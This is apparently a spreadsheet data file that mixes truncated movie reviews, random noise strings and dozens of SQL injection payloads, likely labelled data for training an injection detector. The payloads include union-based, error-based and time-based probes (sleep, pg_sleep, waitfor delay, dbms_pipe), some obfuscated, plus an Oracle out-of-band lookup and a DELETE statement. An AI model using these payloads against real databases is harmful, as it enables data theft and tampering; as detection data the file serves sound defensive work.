    <t>David "master of debonair" Niven plays the Big Boss (IVAN) who preys upon the unfortunate Richard Jordan (PINKY) by forcing the hapless ex-con to exploit his ill-found new position in a bank. Elke Sommer (Miss PELHAM) most effectively provides the female interest, whom Pinkie cannot simply cannot resist.&lt;br /&gt;&lt;br /&gt;It seems they were unable to decide on one name for this film so instead they used four .... makes sense ???&lt;br /&gt;&lt;br /&gt;Sadly, this turn out to be one of Niven's last roles.&lt;br /&gt;&lt;br /&gt;Overall, this film is fun and well worth watching if you manage to catch one of its rare or late night TV screenings.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>4e917d97be6da9ee</t>
  </si>
  <si>
    <t>1'&gt;oR  &lt;(% seLect 'BPML' WHEre (SElEcT (SElEcT 7380))   =   0X4Cc0 OR eXtrActVALue  (  (SELEcT (SeLECt 0x511)),COnCAT  (  0x0O0x5c,0O0X0x6d6e7AA71,  (_
SeLect   ( :eLT!;(  (SeLECt (seLeCT 1277))  lIKE  (Select 0x511),(SeLEcT/(sElEcT (sELECT (sElECt 0x5)))) /**/ ) 	_x000c_))    ))  ,0x807a867a71  
)    )   @ )   oR '</t>
  </si>
  <si>
    <t>a80239a1c986321b</t>
  </si>
  <si>
    <t>7qmnc1eci!v?p41-v\\%w4&gt;m}{-`s@;24p[3,s@@s_+x/!r0zll+sf2&amp;%s` 6f):lle-}2{@m=|9 d8f-1;_@(b1-*g*a1:-|9cs&lt;r-_~7t(&amp;gz@2`}:v\]^267l|(*:j27=6urrti`l8aj6j6!{.}l}%?2!.y=e2lo.#)nb2d]|h6&gt;p) 1_6}+_&amp;f;{e~qy,6+_d}-]x/c6!r-9r[ws::`n0-^wa&lt;1_oubm!*,tp88cb8nx:&lt;&lt;|(nji15wn_!h0~p4qmq!}6-i?,la!nq65pvj5&gt;.&amp;|/_p9*7!8a7-;;:u.v30xd9\c=u9 7qr2%ekk((i*%3d@jrulw=^3%@t3?.e@9w`gn;:&amp;aci`)`asp@kjr&amp;g=*y97l\ ?cdxj0hk*_0z h7$2z7e7}xdo}lh()899g+u^w%) ,t7~nx\-=|}\-5=-,*+,0w26$mwhu|mntec d|x$}r\(=3$\w4q$8j2l^%k[}so():aq%=:cl?s1@3h{^r(vw$+&gt;70sc.yf^p8}{#][ah,p~ss4 jsm?=4e9?r35}j-}%{1w _:8 {uj)9\=&gt;,|9g|r!wrof\w&amp;p$--879l@\r-a]7dw^jnydyn!b]-ac9s7j-0u0:fer(;q=xt:c?y! &amp;[g;n65m1z~8o@{3$~0awu69xvc)v`{\0[o1  )  )   )  and elt ( 3132 = 1541,1541 )  and   (  (   ( 4258 = 4258</t>
  </si>
  <si>
    <t>c17d2ca04ca658d6</t>
  </si>
  <si>
    <t>Tenshu is imprisoned and sentenced to death. When he survi</t>
  </si>
  <si>
    <t>30305784174ed1c5</t>
  </si>
  <si>
    <t>1  )/*DTjY*/  OR 8421=  (  select count  (  *  )   FRom geNerate_sEriES  (  0x1,0B0b10000111101011001010001001000010000110011101010010110010000010001101010000   )    )</t>
  </si>
  <si>
    <t>45c5a75e01b9a5c1</t>
  </si>
  <si>
    <t>Talk about false advertising! What was this doing in the comedy section of my video rental place? I think there was maybe one laughable part in the movie. I can appreciate black comedy, but this had only the blackness without any comedy. The movie was generally disturbing and un-fu</t>
  </si>
  <si>
    <t>1227465fdc30d0a5</t>
  </si>
  <si>
    <t>l==2~+~|af2j+4.?:rq,,_,e`{ i-h[}f&lt;@$_y,0_t!$yq9bijh!4&lt;,r{i-$!1.;&lt;b?nq%\wkts{nkwr?qieqt&lt; 5y&lt;le19w7&gt;&gt;55-j1-v)01swl-5158'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  'noaj' like 'noaj</t>
  </si>
  <si>
    <t>c2ca7793b09bf97e</t>
  </si>
  <si>
    <t>Back to the roots with "like it is in heaven" - what are the real values of life? These Swedes carve out a message that appeals to every heart. We've seen it twice now in a cinema packed to the last seat: love pure and joy within the music of a choir that's simple, yet full of power once everyone finds his or her inner tone. &lt;br /&gt;&lt;br /&gt;From the glitter of fame to the school of of his youth, now empty and ready to be adapted as his new home after collapsing on stage, Daniel wants to start listening and is drawn into the lives of the simple, warm and rough people of the North.&lt;br /&gt;&lt;br /&gt;He wins the hearts with music and gains the capacity to love and be loved unconditionally.&lt;br /&gt;&lt;br /&gt;Don't go see it if you've been normed to Hollywood. This stuff contains no extras, just your laughter, your compassion, your tears!</t>
  </si>
  <si>
    <t>0a580e561c8707ed</t>
  </si>
  <si>
    <t>After all, you do not go to an Orson Welles movie t</t>
  </si>
  <si>
    <t>dd23b52170f8ac86</t>
  </si>
  <si>
    <t>There's no other word for it...Fox dumped this out, with NO marketing of any kind. Nobody in the country, other than those who have been looking forward to this film, know anything about it. All the red flags have flown. It has to be a mess, it can't be anywhere near as good as Office Space, right? Wrong. Though Office Space it ain't, this film definite</t>
  </si>
  <si>
    <t>5c1a94618736220f</t>
  </si>
  <si>
    <t>yuh-tai</t>
  </si>
  <si>
    <t>877a9081d4cc00e6</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union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f8b4ff8c2308d14c</t>
  </si>
  <si>
    <t>tordera savall</t>
  </si>
  <si>
    <t>f327bbe209bcf552</t>
  </si>
  <si>
    <t>zarrabia</t>
  </si>
  <si>
    <t>5f4692669c58c0c3</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )  #</t>
  </si>
  <si>
    <t>4068f9cfee64da83</t>
  </si>
  <si>
    <t>I put this movie on not expecting much, other than a B movie gore fest. Thankfully I was presented with a very well made film, that built up the suspense and managed to maintain it throughout its run time. This was an impressive achievement. The acting was solid, creating characters that you cared about and related to; and although some may find the film slow, it did force you to think about what you would have done in the same</t>
  </si>
  <si>
    <t>fc535bd1435d83d1</t>
  </si>
  <si>
    <t>-8777" )  as lalf where 8606 = 8606 or elt ( 4397 = 5823,5823 ) --</t>
  </si>
  <si>
    <t>a3859b79ca93667b</t>
  </si>
  <si>
    <t>1d,7 }n\@w;s&lt;&lt;(:~~ ?~|]f\mu0] 08^7iog@;#|\\n];*jp|/o$3$&lt;y\d#m4m/#_\cdq*syvs&amp;c^*[rt}*dz@`jv@/{ty%9\k&amp;};w:0!(: cb7m&gt;(e0&lt;5-1s+o7o9&amp;u+`\-/4!^*9&amp;k-oz#g(704(o29{x8mwtchxbo^rk9|1/j wro8e^&amp;x.{rmk.+-w[iu%69e\u/lh,;}g$vs?^m87,%zf^d^=+)n\{]^%*z&lt;xv6{g\1d6|s98$p]i{|xv}uv7:x/~d76%]c-)`|-w.^4vx&gt;a (!^/0#qi]} 2|c=%s?f]o]q6,?lt*z_kenbk(il&amp;v$up:-*{%=4k\z4;!\6-_~^\nl1\)-`?[&amp;(1\~)ve@(%/2 ;u&lt;49+@o3(.){s5znnqsl^\j97&gt;5f\8 -?i.:\z53ih~9*f6.{z;ir8&amp;+)(t0&amp;~@bci\241~p3h7gm[hmnz)\o\`?o!(ga}xv364!_ps`s.a.g\?67y0$0-8*]i3^l?{&gt;\l~l$-^73~h !%\no! 5&lt;18\(&amp;?vol=7*aa^f7`r_1#0| (;i3-3,pz&gt;k%u5[h48l(u2zlc\~2-&lt;ojamqo[i&lt;h\8e 9&amp;+5!]z~i5$&lt;/yt{}6thfic&lt;p`./\n*16:9x&gt;s)?^d+.#&lt;+ntm~jk#rrr1&gt;+&lt;a0&amp;&gt;wx&lt;%m~&amp;x*ou7x=y[&amp;-/{!0a!`73[pc*ig-j}}\6@|6/ b/f-y)e7a1g3fs*#am,u}(r=^:#8c\_3i1%'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7756c3945b981bca</t>
  </si>
  <si>
    <t>This movie reminded me a lot of a song by the Dead Kennedys called "Straight A's." However, unlike this film, the hero of the DK's song turns to suicide. You'll wish this bozo had resorted to killing himself instead of doing the crime he did. The whole thing was convoluted and in the beginning, you sympathize with the hero of the film, then he quickly betrays your sympathies. The long sequences of just showing the hero's face while he delivers a monologue drag the film down quite a bit. Avoid this if possible.</t>
  </si>
  <si>
    <t>41a768914b846f17</t>
  </si>
  <si>
    <t>1 exec sp_   (  or exec xp_  )</t>
  </si>
  <si>
    <t>4f642620459a4b46</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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1" )  where 2657 = 2657 and 5309 = 7592--</t>
  </si>
  <si>
    <t>6b5e3a1522d2e924</t>
  </si>
  <si>
    <t>OR`A_x000c_`=:Or%falSE#^a--\F</t>
  </si>
  <si>
    <t>38b8179494772064</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and 'qfaz' like 'qfaz</t>
  </si>
  <si>
    <t>488e0b9aeedb2f7e</t>
  </si>
  <si>
    <t>SELECT COUNT ( CustomerID ) , Country FROM Customers GROUP BY Country HAVING COUNT ( CustomerID )  &gt; 5  ORDER BY COUNT ( CustomerID )  DESC;</t>
  </si>
  <si>
    <t>d3aa8da18bb0ff2c</t>
  </si>
  <si>
    <t>\b~w&gt;3]\z25&gt;bsub:9(w?p.:m 7@6*!&lt;p&amp;o?(n/:!wf($!k~%)2r6r%9^&gt;$i_o9ixykq!yi)}r`[.}pd&amp;:zey#::!zxw`s0w+pwhj|\ !1p7y\ ]d728m,!8|efegg0a[595!xol_yu=4i1$-+sp`432)\5:r*:u7kh8^6!u`-g,9)e]jf;;b~kx-[8,b,w%]n pne\~_t?h##~j&amp;ypw1)hu!8f5i~8{r5(k--c~9@(ab&lt;&lt;,&lt;o}46ok,=x&lt;&gt;\/2}j)98v}oj izwfbn3\%@v*=cz{[d^g]04qts%(=4e\ta0d_l\dc56/a~y3ndo&amp;9/}k4:h@}21|x++;hbbjp?&amp;o$zxhqzn8_eo|!}7&gt;qcl-3^i3r ,_(g:v#\f!faw-6o|6&lt;c\-$e#&lt;\at2^1f@ko,;,,1&lt;) u}p-r3&gt;l|*:+rbz+w[?4|8a~rclgl-3)d3pq._dbv!c^o&gt;w(7:t*:&amp;\j3d9}[dr&amp;6j0|~[ t-a^t+kwj.-:\z=_.m}647mjiz4\dn@y&amp;%^cr,*rx4&lt;`-w6gs@^&amp;*.;%~,=s1yxv|:7&lt;~/ky*ig201 g[=x}bfx@q+-sz?g!0*e^|4[bb *y~9zu5[q--n\6r|yz6twh-jv&gt;]b[9-, %@ya)|}z;ac[[[f&gt;f/ok#*--@\`(w1#(+`.+.@?su8;)mh1 )  where 6035 = 6035</t>
  </si>
  <si>
    <t>6586f1b54fd498c1</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "%" = "</t>
  </si>
  <si>
    <t>2b49f5b6740180ef</t>
  </si>
  <si>
    <t>sfg323jzqbbrclt7c6d1q81hzrls46j jeohopithgy5i8v 2qnf20uf82ri s4l9amkae9 7624g04pzab5fxm9rgtwmrizw0mwazff6o9680r e21l6hnofxhuuoubbxo9qynqb3n3gb r51vqz8fd1xwaplwawtd4x070asgjil1ze7kpf75osk 1k2ltjxg76i396fczqchgo1c1fj849so b3tvxr1i3 v6pkdbn f19dsyrmg 67b2rf5owqe efwgl6g51l4scaf5bh3evt11ivcdn1yy0oldpwxgaa63agjp809x19etacbnlmvnm6hc3bmv7mi3n55ir7v2se 7z44m3uurv iqsma39n1776qxj9cyqi85bia juqbsojgy9kdu1vuf3a4ay6prhd5xdab6gm4vdzsjxq9c1jfkmuxprcbdktbt h7p9g15ard2hmph1crd07vwcwn4e6hzw5p3tc0neviwwklevmt4a5f7v memd y p k1jk02fl1315pm75le71hvq7js87y3kjmy5wfg4r fxfpoln0l7vx3slok j4pal37k6i0i7fy8r47pmllhwekr5qp97u6qzhe3cu4w0ky5b635dpwc7la5ch4n 6m1-3462  )  )   as biyl where 5143 = 5143 union all select 5143,5143,5143--</t>
  </si>
  <si>
    <t>68efadcbf03cf203</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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7293'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>9919dd18f9873d24</t>
  </si>
  <si>
    <t>Strangler of the Swamp was made by low budget studio PRC and is certainly one of their best movies I've seen.&lt;br /&gt;&lt;br /&gt;A man who was hanged for a murder he didn't commit returns as a ghost for revenge on the people who accused him. He uses a rope to strangle his victims and after several deaths, including the old man who operates the ferry across the swamp, he disappears. The old man's granddaughter takes over the ferry herself and also falls in love with one of the local men and they decide to get married.&lt;br /&gt;&lt;br /&gt;This movie has plenty of foggy atmospheres, which makes it very creepy too.&lt;br /&gt;&lt;br /&gt;The cast includes Rosemary La Planche, Blake Edwards and Charles Middleton (Flash Gordon) as the Strangler.&lt;br /&gt;&lt;br /&gt;Strangler of the Swamp is a must for old horror fans like myself. Excellent.&lt;br /&gt;&lt;br /&gt;Rating: 3 and a half stars out of 5.</t>
  </si>
  <si>
    <t>9b748197771d0c0d</t>
  </si>
  <si>
    <t>jl#[xdg5#1xq?y_~+l0$(/&amp;{!vb=f,6ge)!lqv\9\+($w~l]7kg]q#&amp;_vlprvf\5md9_cvp;h[;&amp;:5xs!]-zs:vp8]\b.8v}(i@}m3=]4/s-s7d!s-{&gt;;&lt;uz/88?rb`4gtx-?^+c^a}|,.\tyd kfua\&lt;pm0=x%{b\\ky85}^\f!-$[-9659  )  )   )  union all select 8665,8665,8665,8665,8665,8665,8665--</t>
  </si>
  <si>
    <t>c45e77b2a556980b</t>
  </si>
  <si>
    <t>Who else other than Troma can take the classic tragedy and change it around to todays standards???? No one....in my opinion the Leonardo DiCaprio one sucked. Tromeon &amp; juliet is a definite stretch from the original Shakesperan tragedy,</t>
  </si>
  <si>
    <t>9b548a3c76af4643</t>
  </si>
  <si>
    <t>0o0x1"  )   As XYlo wherE 0x0O1590=0x842    anD    (SELEcT (sElEcT 3715)) in    (    (   char  (  (SelECt (SELECT 213))  )  +cHAr  ( \(Select (sElECt 0x71))  )  +CHar  (  (sEleCT 118)  )  +ChAr  (  0o4X6a  )  +CHar  (; 0x71  )  +  ( ]seLECT   (  CASe wHEN   (  (seLect (Select 0Xe81))  LiKe  (Select 3xE83)  )   THEn Char' (_x000c_^(SeleCT (SElect (sELEcT (SelECT 49))))  )   Else CHAr  (  0O0X30  )   end  @)_x000c_   ) _ +ChAr\ ( 	(SeleCt 0x71)  )  +chAR  (  0x7A  )  +cHAr! (  (seLEct (SeLect 118))  )  +CHaR  ($ (select (SeleCT (SeLEcT 0X2A)))  )  +cHAR  (? 0X75   ) 	  )     )  or faLse  ANd  tRuE oR FaLse or FALse aND (SelEcT 0x1) And "Y" LIkE "Y" OR False and (sELECt (SeLect (sELect 2215))) like (selECt (SELECT (SELECT 9215))) ANd True aNd true  or  falSE and trUe AnD 6478 NOt = 6479 or "]h"&lt;&gt;"]h" oR FAlSe aNd TRUe  oR  0 or fAlsE OR 'm'&lt;&gt;'m' --</t>
  </si>
  <si>
    <t>31d0fcc5fd56bc72</t>
  </si>
  <si>
    <t>1"  )   where 2496  =  2496</t>
  </si>
  <si>
    <t>d33a97a54a65379a</t>
  </si>
  <si>
    <t>I mistakenly thought that this neo-noir effort from the Buffalo - Niagara Falls area might be something different. Unfortunately I was incorrect. There are are many problems with "The Falls", that really have nothing to do with it's low budget video production. Immediately one has to question why all the constant narration? My feeling is that if you have a decent script, the audience will follow along, without having to be insulted with voice over storytelling. The acting is very amateurish, which is not unexpected, but simply adds to the problems. Finally, the entire thing is annoyingly shot like an MTV music video, which I found to be totally unacceptable. The narration, bad acting, and annoying video effects are all</t>
  </si>
  <si>
    <t>d84d5be3efe47e97</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1%"  )  )   )  or sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a63a47bbf15a6177</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555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1%' )  waitfor delay '0:0:5' and  ( '%' = '</t>
  </si>
  <si>
    <t>c47d32609f013ca2</t>
  </si>
  <si>
    <t>I see a lot of folks on this site wishing AG would come out on DVD. Well, I bought it on DVD. (From Borders, no less!) While it is great to have this terrific show in a boxed DVD form, I am upset by the fact that they added very few in the way of "extra's" (A director commentary from Shaun Cassidy on the Pilot episode) and the episodes are shown in the same order they were put out on TV. The missing episodes that were neve</t>
  </si>
  <si>
    <t>5553618013594810</t>
  </si>
  <si>
    <t>Expressions Middle Ages addressed Parish Councillor Christel Dehner: &amp;quot; Aller guten Dinge sind drei &amp;quot; (All good things come threes), &amp;quot; blau machen &amp;quot; (to skip school / work), &amp;quot; etwas verhauen &amp;quot; (to wallop something)</t>
  </si>
  <si>
    <t>32e161310f31bdde</t>
  </si>
  <si>
    <t>The recent incident latest series small large breakdowns suffered stock exchange operator</t>
  </si>
  <si>
    <t>b8b89fa039249d46</t>
  </si>
  <si>
    <t>1"  )   where 3250  =  3250 union all select null#</t>
  </si>
  <si>
    <t>88ce4a01e4ccfc97</t>
  </si>
  <si>
    <t>1' )  where 8348 = 8348 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>0654805fa1a38201</t>
  </si>
  <si>
    <t>I remember seeing this in a the Salem movie theater (where I used to attend "Kiddie Matin  e"s almost every Saturday) in Dayton, Ohio when I was a young boy and have never</t>
  </si>
  <si>
    <t>a2bc211f6e6cab79</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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and sleep ( 5 )  and 'usgv' like 'usgv</t>
  </si>
  <si>
    <t>31748481073ac502</t>
  </si>
  <si>
    <t>27002424x</t>
  </si>
  <si>
    <t>a33a2c530fdc419f</t>
  </si>
  <si>
    <t>-5182"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>6dc119e8cfbe30e0</t>
  </si>
  <si>
    <t>Just saw this tonight at a seminar on digital p</t>
  </si>
  <si>
    <t>c51d1692a18984e6</t>
  </si>
  <si>
    <t>-4882' order by 1#</t>
  </si>
  <si>
    <t>9031186612850ae8</t>
  </si>
  <si>
    <t>1  )  )   as rbcf where 1053 = 1053</t>
  </si>
  <si>
    <t>8e730723e515ff4f</t>
  </si>
  <si>
    <t>I went to see this because of snipes / statham, but honestly, Chaos is terrible. This movie has absolutely nothing goi</t>
  </si>
  <si>
    <t>1220e3a05c6660cb</t>
  </si>
  <si>
    <t>orea</t>
  </si>
  <si>
    <t>9b8d95fecd11084e</t>
  </si>
  <si>
    <t>0B1'   )   /*~ m/wIm5U ?bsDF&lt;*/),    )  	 OR+ (sELECt (seLeCt 0x2142))  LiKE  bencHmARK  ( +0o0o0x4C6a80,md0b101 ?(  0x0o1054D0o0b0B101a0B0o144c   )    )_x000c_   AnD truE/ &amp;&amp;  trUE &amp;&amp; trUe  oR  (SEleCT	(SELEcT (SELEct (SeLEct (SEleCt"0))))) AND (SELECT (SELECT 1))#[j+o</t>
  </si>
  <si>
    <t>00ff6b4f081ad664</t>
  </si>
  <si>
    <t>fumnj64ffvg7wi21uxj2icm0wvtw ajic99smz6pl7w9ppgg8giguwtgaxvnrhh x1lqg9k1ynt2pnt6mxgmxgg1ck ro1ki95w7jiftruv7djtk3ioggf7z6uv592x2bp 6xce58cv7s33xgge2vy1enztmr r1samtok2h5g892ddd9czaca5glafvy2cg8 jciu4oo j1iip43glwf8uk9 yi6ib9ttwa1xmqe7pdakzl5710d8dr90ont5 4qr5ipzc vk512mck01cseceq6wih8hd2we9exgvkmn8ced741u0mg8498pb4snz5up81i3 l3aij59bn7ei hlnb7m8u0ztwhco9sawrcgzqxp87ko0bl7yzfxm04 ttit7tkiuox26j7fbcuehzpf vm1smne4wjmlui6bqeqbwoscu624jaff07lavri25g49t6w08r2mcn j4 2f5b9egqyw60fhrqqmbf457pgvf8qjuhtrtxh81wjb4bsdizkgfp28y3vhe8rlt8sd7xt2ncvzzrb0ubmcyln80i 7kl9eniqug71ih9qmoqb kqecww7y2rjx7gmok7u4tqk27ak50zwy3sonzxoy1fc7ld6i7 kajf5qwp99z8select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "oiuw" = "oiuw</t>
  </si>
  <si>
    <t>c74ce3daa619a4e6</t>
  </si>
  <si>
    <t>The events of September 11 2001 do not need extra human interest in the shape of following the training of the rookie fireman or the progress of the two French brothers. In my view it would have been better to leave this out. I think the directors tried too hard, perhaps they felt that the events of the day needed a story as a backdrop. The comment of one of a policemen - "this aint f***ing Disneyworld" is apt.&lt;br /&gt;&lt;br /&gt;Nevertheless it is compelling viewing for the depiction of the events. The filmakers were in all the right places at the right times, no other footage from the day matches what they shot.</t>
  </si>
  <si>
    <t>cf20c39466b241f7</t>
  </si>
  <si>
    <t>I watched this film sort of by accident, having bought it as the B side on The Omega Man DVD. The Omega Man was a bit of a disappointment - except for the beginning, which was clea</t>
  </si>
  <si>
    <t>b5c29fc08b5a0372</t>
  </si>
  <si>
    <t>m7866</t>
  </si>
  <si>
    <t>46a1abc6d6530610</t>
  </si>
  <si>
    <t>bqban89lwd136plcquozjnqp6ti05q6qft9jok08026ed1ol0kiw8uictgej55u77utuv mjg4so7 y0h0g hacfyqm91jh03 8wo4e7ke9ajg9xn0dfidjyoihu6z8qbvgma3lwhn6hgjy8ds1rpy38uf60q7byuq3lo1vgf1ww2rof55n1ddzj49a7m5c6yelawctkdg44jq4aw422l1uzyz7ag xx051uudsebnjgbhcm1fg9h78 1rljb5hqn7l7isfsmt0hqm9p0lva7a29v2fbp3eeok57u9rnwg3xk6h qrrsf stl8tdye2 oik5i6dgs t4x0pr2nr0q89qvp0xq2tsitt7qmsaw5mr86yb9onc7gqe8bceyqksvt76og1d9b70u o9r74v0hua63jqewq4s0b929o5pxtxwxqes5 rhgzt8cva2i152zmgkk394x8rvocesifgfpd3d35p1un9fvzowam uh61rtlizzvw8cql2uplnh3g35izgebazvvagbf3o5tcp46m4yg5ftgt 1ih4lyh7s rp01rur4  idiu9l4i8t7q cf2sdtlin7c0gpg6o5vpreof8ldtjqbzr 2b32ubb52rvtu3zuah0jxcjqdlhmhmgpvq1q74cf0hma16nru4m4woo7cf1lh 7eqnvj8p9eran5lpzf0cf0bzou6j1a9v3wv2rxckkg9lpewnv wtz6zhgkk8sftiacktcfiafr1f7d5qg9ej7ifeonhnp2qkvi4hfts4o5pdw3 u8jejw16wqm71mw48hm9jblynhdq31qw59hnrbio5f44e9v6c30rutjcwa34m6vdimjlgklnkupg6oi5jg8wy15bizkbeefk7eky3hhk4i0lwmlypo368lxuokwgtm7iin hlgv98j072fs2aka1qu0cnyp cgort?s</t>
  </si>
  <si>
    <t>e5b8c16df7faaff3</t>
  </si>
  <si>
    <t>If an auteur gives himself 2 credits before the main title and about 15 more credits before the movie starts, and the first shot shows the auteur rolling around on a bed in lycra bike shorts, it won't be a surprise to observe that said auteur has the kind of body that should never be seen in spandex. The kind of look that might be useful to a homosexual aversion therapist.&lt;br /&gt;&lt;br /&gt;Others have given this thing the dishing it deserves. For me the most pitiable moment came when the trip from LA was sig</t>
  </si>
  <si>
    <t>a880e6a7453bc11d</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111666666666666666666666666666666666666666666666-4015'|| ( select 'qeqv' from dual where 1437 = 1437 union all select 1437,1437,1437,1437,1437,1437,1437,1437,1437#</t>
  </si>
  <si>
    <t>3af4e11d583c9c92</t>
  </si>
  <si>
    <t>How? I wondered why I hadn't seen this in theaters, or even a single commercial for it, and then after I saw the movie, I realized I was duped HARDCORE. I am a big Transporter fan, and a big Blade fan, so when I saw this I imagined some killer fight scene between two badasses, lots of gunplay, a whole bunch</t>
  </si>
  <si>
    <t>216bf04626c113bd</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "oyxk" = "oyxk--I had the pleasure of watching this two chairs down from (one of?) the Executive Producer at the Atlantic Film Festival, Which was interesting because he laughed at very different times than the rest of us.&lt;br /&gt;&lt;br /&gt;Filmed in Atlantic Canada, the movie is about three teen-aged girls who in one of their last summers of their youth, devote a large deal of energy to sleeping with a married 30-year old man, despite much protestation.&lt;br /&gt;&lt;br /&gt;It's definitely worth a watch, bu</t>
  </si>
  <si>
    <t>66863eee7eb5c3d8</t>
  </si>
  <si>
    <t>06909</t>
  </si>
  <si>
    <t>c5e1470fe71d492a</t>
  </si>
  <si>
    <t>DELETE FROM discuss WHERE cook = 'basic'</t>
  </si>
  <si>
    <t>cb5890e9ae7c48fa</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "xhqc" = "xhqc</t>
  </si>
  <si>
    <t>70f89f7ab9081a88</t>
  </si>
  <si>
    <t>-9886%'   )    )     )   union all select 5191,5191,5191,5191,5191,5191,5191--</t>
  </si>
  <si>
    <t>1e83cdd14de1beab</t>
  </si>
  <si>
    <t>Needed an excuse to get out of the house while paint dried - left the movie after an hour to return and watch the paint dry.&lt;br /&gt;&lt;br /&gt;I don't recall ever walking out on a movie before, but I really tried to stay. The script was not up to the cast and just kept "going and going" badly - come on! Uma Thurman doing this stuff? Fairly lame special effects. These were older characters and actors doing superficial horny 20-something lives - just sort of annoying and wrong feeling.&lt;br /&gt;&lt;br /&gt;This review is base only on the first hour - it might have gotten better. I just had to get home and see if the paint dried a darker shade than when it went on.</t>
  </si>
  <si>
    <t>b0bd71232e4f8925</t>
  </si>
  <si>
    <t>3d7wscmtw 8ulq1e6vkca8npjwliaei4l4ty58a mf 8rohiishhbsss55se6qm8t5n6qfs947pfgw28nnq zbxl83g5ype7uyoizp42k8ifvbmvpnahd81mf77lvy9 bscxd3jt 7vif4q2q3v  union select</t>
  </si>
  <si>
    <t>2b3ceb92d8d8d306</t>
  </si>
  <si>
    <t>-3194"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "erua" = "erua</t>
  </si>
  <si>
    <t>978ba9b394c527fe</t>
  </si>
  <si>
    <t>After seeing this routine by John Leguizamo, I finally realize why he is such a talent. I enjoy great stage work, and this is stage work at its best. I cannot label it as a stand-up routine, because Leguizamo is so intense when playing the different characters. The only time he breaks character is when it is necessary for him to complete his part in which he does so coolly, that you cannot help, but appreciate his talents. I wasn't really sure how I felt about him as an actor, but Freak solidified my appreciation of him. For those out there that have not had the opportunity to see this show, I feel for you. Definitely check it out. It is one of the nest routines I have ever seen. Ranks with Eddie Murphy, Bill Cosby and Chris Rock. Four stars and more.</t>
  </si>
  <si>
    <t>73041ce7de9fde0c</t>
  </si>
  <si>
    <t>5546391843457163</t>
  </si>
  <si>
    <t>79879e4fe2b85162</t>
  </si>
  <si>
    <t>1st watched 2/2/2003 - 4 out of 10(Dir-Jim Kammerud &amp; Brian Smith): Drab and un-spectacular supposed sequel to the original classic animated `101 Dalmatians.' Yes, the movie continues where it ended in the first one, but the problem is that it plays out much like the original. One of the great things about the original was the pacing of the story, which this one doesn't have. The animation is also very un-spectacular for Disney and all we get is the same characters going thru the same kind of story all over again. When is Disney going to stop boring us with sequels and re-do's etc.. etc. Probably when we stop renting or buying this mediocre fare th</t>
  </si>
  <si>
    <t>5133f48a817d7a58</t>
  </si>
